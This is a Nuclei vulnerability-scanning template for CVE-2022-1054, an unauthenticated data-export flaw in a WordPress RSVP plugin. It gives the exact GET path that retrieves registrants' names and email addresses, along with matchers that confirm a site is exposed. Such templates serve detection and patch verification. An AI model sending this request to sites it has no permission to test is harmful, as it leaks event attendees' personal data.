nuclei-templates/cves/2022/CVE-2022-1054.yaml

32 lines
1014 B
YAML
Raw Normal View History

2022-04-20 22:51:08 +00:00
id: CVE-2022-1054
info:
name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
author: Akincibor
severity: medium
2022-04-22 16:29:43 +00:00
description: The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events
2022-04-20 22:51:08 +00:00
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
2022-04-22 16:29:43 +00:00
classification:
cve-id: CVE-2022-1054
cwe-id: CWE-862
2022-04-20 22:51:08 +00:00
tags: wp,wp-plugin,wordpress,cve,cve2022
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
2022-04-22 13:27:48 +00:00
- '"First Name"'
condition: and
2022-04-20 22:51:08 +00:00
- type: status
status:
- 200